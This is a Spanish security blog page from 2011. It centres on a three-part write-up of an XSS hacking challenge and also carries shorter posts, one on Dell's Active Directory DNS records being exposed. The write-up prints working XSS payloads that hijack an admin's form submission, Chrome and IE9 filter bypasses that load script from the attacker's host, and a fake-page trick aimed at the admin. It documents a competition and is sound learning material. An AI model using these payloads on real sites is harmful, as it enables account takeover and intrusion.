Supuestamente necesitaremos codificar nuestro mail (con el que nos registramos al reto) para poder validarnos correctamente, por lo que hacemos la operación inversa para calcular el base64 correspondiente, en este caso, al mail con el que me registré (pepeluxx@gmail.com) … menos mal que no usé ninguna dirección guarrona xDD. Bueno, pues el script que usé es:


Figura 7: Script en Perl para codificación de mail

Evidentemente, la palabra que se usa para hacer el XOR debe tener la misma longitud que mi mail. Y el resultado: base64(mail XOR 'infiltradosinfiltr') -> GrkWDAABChkkCB4IBwpHDxsf

El segundo parámetro, app_hash, podemos ver que tiene 40 bytes por lo que una posible codificación es SHA1 o RIPEMD160. Preguntando el resto de participantes (el que no haya preguntado a nadie que tire la primera piedra xDD), vi que el mail era el mismo para todos pero el app_hash variaba. Cerrando sesión y volviendo a entrar siempre tenía el mismo hash. Incluso conectando desde otra dirección IP, éste no variaba. Eso me hizo pensar que tenía algo que ver con alguno de mis datos de registro.

De manera que probé a codificar cada uno de mis datos (nick, nombre, apellidos, mail, provincia, población, incluso el ID de usuario con y sin guiones). Lo probé con SHA1 y con RIPEMD160 al mismo tiempo que usaba el base64 correspondiente a mi mail. Intenté validar usando mi mail y ese hash resultante pero no hubo éxito.

Tras esto pensé en intentar averiguar cómo estaba formado ese hash, del mismo modo que hice con el mail. Así que me creé un script que probaba todas las combinaciones de mis datos de registro (solos, concatenados a dos, a tres, etc) y luego encriptando con ambos algoritmos y buscando como resultado el valor que no daba la URL. Tampoco hubo suerte.

El siguiente paso fue añadir al script un XOR de la palabra que le metiera como parámetro. Probé con infiltrado, informatica64, el nombre de la url, mis datos sueltos, concatenados, etc … nada. Luego probé lo mismo pero combinando un base64 y el XOR o el base64 sólo … nada de nada.

El caso es que enfoqué mal la forma de resolverlo y busqué obtener ese hash que tenía, cuando lo que debía haber hecho es probarlos directamente en la URL, ya que, al final, la solución era tan simple como rebuscada. El hash era: SHA1(mi_id concatenado con mi_mail)

Por tanto, mi solución (diferente a la del resto de usuario, evidentemente) fue:

http://rhinfiltrados.informatica64.com/F@S%E2%82%AC_TW0_INI.aspx?mail=GrkWDAABChkkCB4IBwpHDxsf%3d&app_hash=7d33c26d2bb41d320e0331363c2c036f6c7de906

Donde:

mail=GrkWDAABChkkCB4IBwpHDxsf
app_hash=7d33c26d2bb41d320e0331363c2c036f6c7de906


Y al pasar el reto vemos:


Figura 8: Reto Finalizado

5- Agradecimientos

Como siempre, ha sido un gran placer participar en el reto. A la gente que nos gusta jugar sabemos lo difícil y laborioso que es preparar este tipo de retos. Así que, enhorabuena y muchas gracias a Informática64 y en especial a Chema Alonso y sobre todo, al equipo de gente que ha estado validando todas nuestras pruebas (sois unos cracks!! xDDD).

También mi enhorabuena a todos los participantes, en especial a Yuri, que ya podía haberse centrado en el reto de Suiza xDDD (es broma), Nadid, danigargu, Budaned y Thanar.


Figura 9: Hall of fame

Y como siempre, saludos para los más grandes! Okaboy, Kachakil, RoManSoft (nunca se si escribo bien las mayúsculas del nick), Miguel Gesteiro, Int3pids (el resto), PainSec, etc, etc, etc... Y otro saludo también a r0i, k4dm3l, ralcaz, marcositu, ….

Hasta el próximo!

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx - http://www.pepelux.org - http://blog.pepelux.org
**********************************************************************************************

jueves, mayo 19, 2011

Formaciones para hax0rs en hacking y auditoría

En poco tiempo van a tener lugar tres formaciones en Seguridad Informática y Técncias Hacking que merece la pena resaltar, así que aquí os las dejo:

FTSAI 7th

Mañana viernes 20, y a lo largo de muchos meses, va tener lugar la siguiente edición de la Formación Técnica en Seguridad y Auditoría Informática que damos en Informática64. El curso está formado por 6 módulos repartidos en diferentes disciplinas de este trabajo. Tienes toda la información en FTSAI.

Black Hat Webcast: HTTP Parameter Pollution

El día 25 tendrá lugar un webcast gratuito, en inglés, sobre las Técnicas de HPP, de las que hemos hablado alguna vez, y de las que Carmen, una de las creadoras de Papas, nos hizo un artículo [HPP: Http Parameter Pollution]. Aunque es gratuito, debes registrarse.

Seguridad en GSM/UMTS

Los días 1, 2 y 3 de Junio tendrá lugar en Valencia el Curso de Seguridad en GSM/UMTS que los "maquinotes" de Taddong impartirán. Este curso permitirá, durante tres días, tocar y practicar las técnicas hacking en estas tecnologías. De todo su trabajo hemos ido recogiendo algunas pinceladas:

- Ataques mitm a dispositivos móviles con redes flasas GPRS
- Riesgos en la predicción de direciones Bluetooth en dispositivos Apple
- iPhone no alerta de redes GSM sin cifrar
- Ataques selectivo con estaciones base GSM/UMTS falsas

Tienes el temario completo del curso en: Curso de Seguridad GSM/UMTS

Saludos Malignos!

Solucionario a Reto Hacking Infiltrados (2 de 3)

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx
**********************************************************************************************

URL del Reto: Reto Hacking Infiltrados

3.1- Mozilla Firefox v4.0.1

En el caso de Firefox no hizo falta saltarse ningún filtro, ya que directamente, no hay. Sólo había que ingeniarse una forma de acceder engañando al admin. Y la solución, tras varias pruebas, fue mandando en el campo ctl00%24cph2%24tbUrl esto:

http://rhinfiltrados.informatica64.com/inicioReto.aspx?idUsuario=950e8c2b-3a74-4f24-a809-40d32a9f73b6<script>function f(){document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809-40d32a9f73b6';document.aspnetForm.submit();}</script>

Para que se vea mejor, voy a desglosar el script que inyecté:

<script>
function f()
{
document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809-40d32a9f73b6';
document.aspnetForm.submit();
}
</script>

<BODY+ONLOAD=f()>


Lo que hace esto es lo que he comentado antes, cambiamos el valor del ID de usuario por el nuestro y luego ejecutamos el submit. Y para que el script se ejecute al cargar la página, lo invocamos con un BODY ONLOAD.

3.2- Google Chrome v11.0.696.65

El segundo en caer fue Chrome. Aquí encontré una solución que yo creo que es válida, pero que no se tomó como buena en las repetidas veces que lo intenté mandar. A ver si Chema me explica porqué no iba }:->

Una vez entendida la dinámica tras superar el obstáculo usando Firefox, ya tenemos clara la finalidad y lo que tenemos que hacer, por lo que antes de mandar a lo loco incidencias, tenemos que probar a ejecutar, sin mandar incidencias, un simple alert usando Chrome. La cosa no fue fácil ya que trae un filtro anti-XSS, pero bueno, encontré googleando varias formas de saltárselo y una de ellas es cargando un fichero externo, tal que así:

<script src=http://url/file.js?

Y metiendo en file.js un alert, por ejemplo (sin poner las etiquetas de script):

alert('XSS')

Como ya tenemos una forma de inyectar, el siguiente paso es probar a cambiar el ID de usuario y hacer el submit. Por lo que file.js quedaría así:

function f()
{
document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809-40d32a9f73b6';
document.aspnetForm.submit();
}

window.onload=f;

Esto dio bastante guerra ya que no terminaba de funcionar. Así que puse un alert delante y otro detrás y vi que se ejecutaba el primero pero no el segundo. Mirando con la consola de Chrome, aparecía un error diciendo que ctl00$cph2$hfidUsuario no existía.

Obviamente, si inyectamos ese código en el que no cerramos el script, todo lo que hay detrás queda inservible. Por lo que una solución fue modificar el script para que creara de nuevo ese input, quedando el fichero así:

function newInput()
{
var inpt = document.createElement('input');
inpt.type="text";
inpt.name="ctl00_cph2_hfidUsuario";
inpt.id="ctl00$cph2$hfidUsuario";
document.aspnetForm.appendChild(inpt);
document.aspnetForm.innerHTML+="
";
}

function f()
{
newInput();
document.aspnetForm.ctl00$cph2$hfidUsuario.value='950e8c2b-3a74-4f24-a809- 40d32a9f73b6';
document.aspnetForm.submit();
}

window.onload=f;


De esta forma ya no daba error y, al menos en el mail que yo recibía, iba todo bien, pero no me dieron por válida esta solución. Así que probé otro método que encontré para saltar el filtro de Chrome y que consistía en usar iframes:

<iframe src='data:text/html,<script src=http://url/file.js></script>

Que en local iba bien pero tampoco fue una solución válida. A estas alturas y ya bastante desesperado, sobre todo pensando en que IE9 iba a ser mucho más difícil aún, lo que probé es a pasar el reto sin la necesidad de explotar ningún XSS, accediendo al eslabón más débil, el humano … y voilá!

La solución pasó por enviar en el campo ctl00%24cph2%24tbUrl http://url Donde esa URL era una IP mía en la que había una copia exacta de inicioReto.aspx, con mi ID de usuario y añadiendo al final de la página:

<script>
window.onload = function(){ document.aspnetForm.submit(); }
</script>


3.3- Internet Explorer v9.0.8112.16421

Este reto lo pasé exactamente igual que con Chrome (supongo que con Firefox también se habría pasado sin problemas) aunque como estuve realizando las pruebas por la noche, con el reto cerrado y, al mismo tiempo que preparaba la inyección para el Chrome, hice algunas pruebas y, la forma de saltarse el filtro de IE9, al igual que IE8, es añadiendo un %0a en la etiqueta del script, algo así:

<sc%0aript>alert('XSS')</script>

Estuve probando la técnica usada por Beni en el reto de BrowserSchool y que consistía en superponer una imagen exactamente igual a la que aparecía en el reto pero que al pincharla llevara a mi IP. Aquí me encontré el problema de que el filtro del IE9 elimina los puntos de las URLs así que para saltarlo use como URL el valor decimal de mi IP y al script quitarle el punto … algo así:

http://3232235876/filejs

En este caso, al contrario que en la técnica anterior, no se podía hacer un submit de forma automática y había que esperar a que el administrador pinchara en la puerta. Al final, esta solución tampoco me la dieron por buena. Y como dije antes, la pasé exactamente igual que con Chrome. Tras pasar los 3 navegadores, podemos ver algo así:


Figura 4: Fase 1 pasada

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx - http://www.pepelux.org - http://blog.pepelux.org
**********************************************************************************************

miércoles, mayo 18, 2011

Solucionario a Reto Hacking Infiltrados (1 de 3)

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx
**********************************************************************************************

URL del Reto: Reto Hacking Infiltrados

1- Introducción

La verdad es que me encantan los retos que prepara Chema Alonso porque están muy cuidados estéticamente. Es cierto que este reto, como su antecesor, son validados por personas físicas y llega a ser un poco coñazo, tanto para los participantes que tenemos que esperar a veces media hora para ver si una prueba es válida, como para los pobres que están varias horas al día validando nuestros numerosos intentos.

Este tipo de retos tienen como inconveniente el factor humano; y es que hay veces que una respuesta te la toman como mala y la vuelves a mandar y te la toman como buena, pero bueno, es parte del reto.

Cuando me registré y vi los logos de Google Chrome, Firefox e Internet Explorer, empecé a olerme (supongo que como todo el mundo) que se trataba de un reto basado en vulnerabilidades XSS, pues tenía toda la pinta de que el reto iba de saltarse algo en los 3 navegadores. Así que un buen comienzo, antes de empezar el reto, es leerse bien los solucionarios del BrowserSchool, escritos por Beni (buena pieza este Beni, jeje).

2- Análisis del reto

Ya pagué la novatada en el reto de BrowserSchool y me puse a probar a lo loco sin entender la dinámica del reto y, en ese caso, creo que no pasé más que un navegador; así que esta vez, me lo tomé con más calma y me leí y releí la ayuda del concurso y, me tomé mi tiempo en pensar cual era la finalidad de todo esto, antes de empezar a mandar y sufrir la larga espera de cada validación.

Tenemos 3 puertas que dan acceso a 3 salas diferentes. Cada una gestionada por un administrador, el cual usa diferente navegador para gestionar las incidencias de los usuarios.

Nosotros no tenemos acceso ya que desconocemos las claves de las salas pero, según la ayuda, el administrador es capaz de entrar a su sala sin necesidad de introducir clave alguna. Esto es importante ya que sabemos que no hay que robar ninguna clave sino que todo apunta a que hay que hacerse pasar por administrador para entrar.

Lo que nos aparece al entrar en la sala de validación es esto:


Figura 1: Puertas sin abrir


3- Fase I

Voy a escribir la solución de cada navegador por orden, tal y como yo lo pasé.

El primero en caer fue Firefox. Creo que está más que demostrado que ante errores de XSS es de los más permisivos y, por tanto, es al que más fácilmente se la podemos colar.

Analizando la página de acceso (inicioReto.aspx) vemos que al pinchar en una de las puertas se recarga la página y nos carga nuestro ID de usuario en la URL (en mi caso, inicioReto.aspx?idUsuario=950e8c2b-3a74-4f24-a809-40d32a9f73b6) y también vemos que ese ID de usuario se escribe abajo del todo. Si probamos vemos enseguida que existe una vulnerabilidad XSS. Por ejemplo:


Figura 2: XSS en inicioReto.aspx?idUsuario=xxx<script>alert('XSS')</script>;

Por supuesto, todas estas pruebas las realicé desde un Firefox, ya que, como dije, es el más permisivo en cuando a XSS.

Por otro lado, si mandamos alguna incidencia vemos que nos llega una copia del mail que recibe el administrador. En este mail viene nuestro usuario, la descripción de la incidencia y un link hacia inicioReto.aspx. En ese link viene asociado nuestro ID de usuario.

Si mandamos otra incidencia de prueba y la capturamos, por ejemplo, con el TamperData, vemos:


Figura 3: Datos envíados interceptados por TamperData

Ese enlace que le llega es lo que aparece en el campo ctl00%24cph2%24tbUrl. Por tanto, podemos tratar de meter algo para que al pinchar, y acceder a la web, explote la vulnerabilidad XSS que hemos encontrado.

En un principio pensé que había que robar la cookie del administrador para luego acceder nosotros manualmente con esa cookie y estuve probando algunas inyecciones en las que trataba de robar esa cookie. La forma de hacerlo fue intentando enviar un document.cookie hacia mi máquina, pero no tuve éxito.

Pensando un poco en lo que ponía en la ayuda, acerca de que el administrador entraba de forma automática, pensé que igual se podía hacer justamente al contrario, es decir, si el admin entra de forma automática, inyectarle a él mis datos para que entre usando su cookie pero con mi ID de usuario. Y así fue como ocurrió.

Si vemos el código fuente de la página nos encontramos con un campo llamado ctl00$cph2$hfidUsuario que contiene nuestro ID de usuario. El admin al entrar en la página, evidentemente tendrá el suyo. Por tanto, lo que vamos a tratar de hacer es cambiarlo para que acceda a la web con el nuestro y acto seguido, hacer un submit para que acceda, de forma automática, por la puerta correspondiente (recordemos que el admin NO necesita validación, por lo que un simple submit hará que pase por la puerta sin tener que escribir su clave de acceso).

Ahora el tema está en cómo saltar los filtros de cada navegador para poder hacer esto.

**********************************************************************************************
- Solucionario a Reto Hacking Infiltrados by pepelux (1 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (2 de 3)
- Solucionario a Reto Hacking Infiltrados by pepelux (3 de 3)
Autor: @pepeluxx - http://www.pepelux.org - http://blog.pepelux.org
**********************************************************************************************

martes, mayo 17, 2011

Hack Story: Historia Hacker

Ya que hablamos de grupos que destacan hoy en día, como los Int3Pids, es bueno conocer a los que han hecho historia antes, y para ello hay que hablar obligatoriamente de Mercè Molist.

Mercè Molist es una hacker periodista. Igual que otros hackers hacen virgerías con las baterías o las dll del sistema, ella lo hace con la pluma. Durante años ha estado siguiendo la historia del hacking y el hacktivismo para poder documentarse y enterarse de qué es lo que estaba pasando realmente en ese mundo. Como periodista ha publicado muchos artículos sobre las motivaciones de los hackers, su ética y algunas de las acciones más importantes de la historia, junto con algún que otro libro.

En España, esta catalana afincada en Barcelona, se conoce a casi todos los hackers de la "vieja escuela", a los que ha entrevistado personalmente muchas veces. Dese su blog, Port666, siempre tiene algún detalle que desvelar curioso, sobre el hacking.

Desde hace no demasiado tiempo, Mercé se ha dedicado a crear una historia de hacking, que ha llamado Hack Story. En él se está recogiendo la vida y andanzas de grupos de hacking como 29A, !Hispahack, DSR, y un largo etcétera, o hackers tan populares como rain.forest.puppy - descubridor del SQL Injection -, el trabajo del italiano Fracesco Vianello en Fravia, el mítico Jordi Murgó, este máquina de Lleida conocido como Savage dentro los históricos Apòstols o el Gran Cuartango, por citar alguno de ellos.


Todo su trabajo está quedando escrito en la web, guardando un trocito de la historia del hacking, no solo mundial, sino también de España. Enhorabuena y ánimo con el trabajo Mercè.

Por cierto, aprovecho para ver si te lío y envías una charla al Call For Papers de la NoConName 2011, que sería superinteresante ver en una charla la historía del hacking en España }:))

Saludos Malignos!

lunes, mayo 16, 2011

Intrépidos Int3Pids

Ayer corría la polvora por Twitter con la noticia de que los Int3Pids se habían ganado un coche en Capture The Flag (CTF) de la Swiss Cyber Storm 3, en Zurich. Allí se plantaron 5 de los miembros que forman actualmente el equipo Int3Pids, echando en falta la presencia de uno de sus corazones Mario Ballano, aka Nullsub.

El equipo que allí se presentó, dispuesto a arrasar, estuvo compuesto por el CPO (Chief Presenter Office) Dreyer, al que vemos en esta instantanea presentando la solución a una prueba.


Figura 1: Dreyer dando unas clases

En segundo lugar estuvo el gran Uri, que venía casi sin descansar, de entrenarse llevándose el Reto Hacking Infiltrados, durante la semana pasada. Bajo la cuenta de Yuri, se escondía el ex-Sexy Panda Uri.


Figura 2: Desde el tercero por la izquierda hacia la derecha: RoMaNSoFt, Dani "The Doctor" Kachakil, Dreyer, Uri y Whats (y más gente)

También estuvieron allí nuestro incansable RoMaNSoFt y su alter-ego .Netetero Dani "The Doctor" Kachakil. Dos patas para un banco compuestas por dos de los cerebros mejor amueblados para pasar horas y horas en cualquier CTF que salga. Pasaron de competir a muerte en los Retos Hacking que hacíamos en El Lado del Mal, para acabar haciendo tema-up en cualquier CTF que se ponga por delante.

El último en llegar, pero no por eso menos importante, Whats, al que muchos conocerán por ser el que ganó el primer CTF de la RootedCON, superando a Dani Kachakil, en un las pruebas que habían diseñado para la ocasión Dreyer y RoMaNSoFt.


Figura 3: Desde el cuarto por la izquierda en adelante: Whats, RoMaNSoFt, Uri, Dreyer y Kachakil

Int3Pids lleva ya un par de años dando guerra, y se suma a la lista de nombres que habrá que recordar aquí en España, como el de los Sexy Pandas o PainSec. Y es que a todos nos gustaría estar ahí enganchados con las pruebas del reto, pero solo algunos pueden hacerlo. Enhorabuena Int3pids.

Puedes seguirlos en sus cuentas twitter: Dreyer (@dreyercito), Uri (@samsa2k8), RoMaNSoFt (@Roman_Soft), Mario Ballano (@marioballano, Whats (@whatsbcn) y Kachakil (@kachakil).

Saludos Malignos!

domingo, mayo 15, 2011

Con DUST nunca más(t)

Durante el tiempo que Blogger estuvo caido, me estuvieron enviando correos electrónicos en los que me preguntaban por qué había borrado un post, por qué no publicaba hoy o por qué había quitado algún comentario. También me llegó algún correo de algún escritor de blog en blogger que pensaba que le habían hackeado la cuenta.

Durante todo este tiempo, el canal de comunicación entre escritor y lector estaba cortado. Estuve tentado a cambiar en Feedburner el RSS para que apuntara a otro Feed alternativo y poner alguna noticia sobre esto para los lectores RSS, pero por falta de tiempo no lo hice.

El caso es que este hecho es un caso claro en el que utilizar fuentes redundandes en canales RSS es útil. En el Asegúr@IT 9 enseñé una situación similar, en la que el servidor web que sirve por HTTP los feeds RSS se cae, no está disponible, y DUST se actualiza por P2P.

En este vídeo podéis ver como suscribimos DUST a un canal RSS por HTTP publicado en un servidor Web. Actualizamos el feed, y todo tan bonito. Despúes apagamos el servidor web, pero añadimos, al mismo canal, una fuente redundante por P2P mediante la adición de una clave pública PGP. Acto seguido, tras actualizar el canal, DUST prueba todas las fuentes, encuentra una nueva en P2P y hace un merge de los contenidos en el canal del blog.


Ahora estais viendo todo step by step, pero en la versión final esto será todo automático, como los lectores RSS al uso, y, además, la adición de las fuentes RSS alternativas también las podrá realizar el dueño del feed, mediante mensajes en el XML, de tal manera que será mucho más transparente todo.

Saludos Malignos!

sábado, mayo 14, 2011

Alta diXPonibilidad en los servidores de Google

Según dice el comunicado oficial [que durante bastante tiempo fue una tumba sin dar ninguna info], Blogger estuvo caido 20.5 horas, por algún problema en el proceso de mantenimieto que comenzaron el miércoles pasado. La verdad es que, a día de hoy, muchos de los posts han regresado, pero muchos de los cambios hechos en los posts y algunos comentarios se han perdido, como lágrimas en la lluvia...

El caso es que algo de justicia divina ha debido suceder, ya que recientemente circula el vídeo de la seguridad, disponiblidad, y el qué grande somos de los CPD de Google.


Viéndo ese vídeo, que publicó Cyberhades, me hizo gracia comprobar que lo que me habían puesto en un comentario a mi cuenta twitter era verdad: Justo tras decir que usan un sistema Linux especial, se puede ver a los ingenieros trabajando,... con Windows XP.


Evidéntemente, la migración a sistemas NO-Windows, no fue tan fácil como esperaban, y a día de hoy dicen que el 20 % de los usuarios aún utiliza Windows. Esa migración, como ya le pasó a Novell, o al gobierno alemán, que pasó de Linux y volvió a XP, no es tan sencilla, debido a las herramientas de adminsitración de sistemas que provee Microsoft. Active Directory y System Center son difíciles de sustituir si los tienes en la empresa.

De hecho, Google tuvo que desarrollar Simian para poder gestionar las updates de los Mac OS X, ya que para el despliegue de parches en empresa, no es que vengan muy preparados. En fin, que en todas partes cuecen habas, y no solo tenemos problemas los humanos en la tierra, sino también los dioses en las nubes.

Saludos Malignos!

viernes, mayo 13, 2011

Libro Hacking con Buscadores: Google, Bing y Shodan

Este post os tenía que haber llegado hoy a las 08:00 de la mañana, per después de la caida de Google ha sido borrado, y he tenido que volver a escribirlo, pero todo sea por cumplir diariamente y spammearos como dios manda.

El libro lo ha escrito Enrique Rando, y se convierte en el número 7 dentro de la Colección de Libros de Seguriad Informática de Informática64. En él, como ya os conté en el post de Shodan y Agentes SNMP: Administrando el mundo, Enrique recoge trucos en el uso de buscadores para la búsqueda de información en la fase de fingerprinting o de datos que permitan realizar la intrusión.


El libro cuenta con 270 páginas y cuesta 20 €. Podéis ver el índice general en formato PDF en la página de compra del libro. Los alumnos del FTSAI recibirán la colección completa de los libros, que puedes acabar de completar tú mismo.


Libro 1: Análisis Forense Digital en Entornos Windows
Libro 2: Aplicación de la LOPD en la Empresa
Libro 3: Forefront TMG 2010
Libro 4: SharePoint 2010: Seguridad
Libro 5: DNIe: Tecnología y Usos
Libro 6: Una al día: 12 Años de Seguridad Informática
Libro 7: Hacking con Buscadores: Google, Bing, Shodan

Saludos Malignos!

jueves, mayo 12, 2011

Luchando contra la mala reputación

Hace ya muchos años, en una de esas raras épocas de mi vida en la que llevaba el pelo corto, era profesor de cursos de gestión de sistemas. Daba clases de redes, de Windows, servidores web, etcétera, lo que me permitió conocer a mucha, mucha gente. Muchos de aquellos alumnos han acabado convirtiéndose en amigos, clientes e incluso compañeros de trabajo en Informática64.

Periódicamente voy re-encontrándome con ellos, y es siempre un placer volver a verse y contarse historias y anécdotas. En esta ocasión, en mi viaje a InfoSecura 2011 en Jerez, tuve la suerte de coincidir con un amigo que había sido alumno mío diez años antes y que llegó incluso a hacer algún trabajo para Informática64.

La historia de este amigo es digna de ser contada, para explicar la importancia de la reputación en Internet, así que voy a aprovechar para desmentir algo: Él no se enrolló con una famosa – aunque los recuerdos de aquella época me llevan a creer que sería porque no tuvo la posibilidad, que si no… -

Por aquellos entonces, mi amigo era alumno de un master de desarrollo de aplicaciones en el que, al final, había un módulo de servidores de internet y aplicaciones, que me tocó a mí. Al mismo tiempo que este artista de Cádiz programaba – he de decir que no era nada malo - aprovechaba para dedicarse a su hobby - no, no me refiero a ligar con chicas y salir de fiesta con los amigos de aquella época – que no era otro sino que ser actor.

En pleno master, en uno de los parones para el café, nos avisó a todos: “Pischa, voy a hacer un trabajito que va a reventar la tele. Voy a montar una güena, pero no os azuteiz…” Cuando yo, con cara de boquerón al pilpil le pregunté "¿Y eso?", el contestón "Pichsita, que buscaban a un actor joven, guapo y simpatíco, y tú sabes..."

Y saltó la liebre…, una periodista tertuliana del mundo del corazón, se tragó el anzuelo de que mi agmigo se había liado con una famosa. Para ello hicieron un fotomontaje con el potosó y se lo endosaron, con técnicas de ingeniería social, para acabar convenciéndola de que la historia era buena. Se lo comió con patatas y durante un tiempo la periodista contertuliana lo voceo a los cuatro vientos.

La fama de mi amigo creció, con el buzz de la historia, e Internet se llenó de detalles de este culebrón, que era totalmente inventado, y no era nada más que un hackeo a un periodista personaje que mama del cotilleo ajeno, que estaba haciendo un programa de investigación que luego salió en televisión. El objetivo del programa era demostrar la basura que nos colocan en esos programas.

Reventándole toda la historia en los morros a la “víctima”, todo el mundo pudo conocer la verdad de la historia. Y ya está. A partir del momento del desmentido, mi amigo pensó que podría seguir con su vida, pero tomando un café y un donut – sí, de chocolate – se lamenta de que todavía está Internet plagado de gente que piensa que estuvo liado con la famosa, o lo que es peor, que sigue siendo actor de investigación. Tanto es así, que él mismo cuenta siempre que incluso ha perdido puestos de trabajo por este hecho.

El caso es que, aunque la famosa se echó unas risas con la historia, y en todas partes está desmentida, esta historia de hace 10 años, todavía le acompaña. Sin embargo, la tertuliana se fue de rositas, y aún se permitió cagarla nuevamente con otro bulo, así, porque ella lo vale.

Y mientras tanto, yo en Internet aparezco en fotos desnudo, "contento" y vestido de pitufo... que chungo lo llevo...

Saludos Malignos!

miércoles, mayo 11, 2011

Los registros DNS de servicio de Active Directory

Microsoft Active Directory utiliza una serie de resgistros de servicio en el DNS que pueden ser utilizados para conocer la estructura de la red una compañía. En la nueva versión de la FOCA estamos metiendo el análisis de estos registros, y uno de los Proyectos de Fin de Master del Master de Seguridad de la UEM estaba trabajando en ellos. Para ello se han estado localizando una buena cantidad de ellos, entre los cuales, por supuesto, se encuentran los de Active Directory.

La sorpresa ha sido cuando les pedí que lanzaran a la base de datos de estos registros de servicio DNS contra de la Fortune 500 no me imaginé que aparecieran empresas con los registros del Active Directory expuestos a Internet, pero algunos, como los de Dell.com son llamativos.

Basta con buscar los registros _ldap._tcp para encontrarte con un servidor DNS propio para gestionar el subdominio de servicios.


Registros _ldad._tcp de Dell.com

Así que con conectarse al servidor DNS que los gestiona y realizar la misma consulta.


Consulta del dominio

Podemos ver un directorio completo de como está la red Windows de esta empresa. La captura es tan grande que he tenido que cortarla por arriba y por abajo, pero creo que os hacéis una idéa.


Respuesta de registros

Esto no solo pasa con _ldap, y se pueden probar otros registros de Active Directory para comprobarlo, como es el caso de _kerberos._tcp.dc._msdcs.


Registros _Kerberos._tcp

Cuando acabas de buscar _gc._tcp, _kerberos._tcp, _kpasswd._tcp, _sites, _msdcs, y los el resto de los registros SRV que ya vimos, puedes dibujarte el mapa de comunicaciones de Dell de forma muy fiel.

Cuando el proyecto esté completo, os daré más información, y no os preocupéis, que esta búsqueda completa irá metida en la FOCA 2.7, así que tú solo tendrás que poenr el nombre de dominio, y FOCA hará el resto. La versión 2.7 estará para los próximos trainings online de Junio.

Saludos Malignos!

Eleven Paths Blog

Seguridad Apple

Entradas populares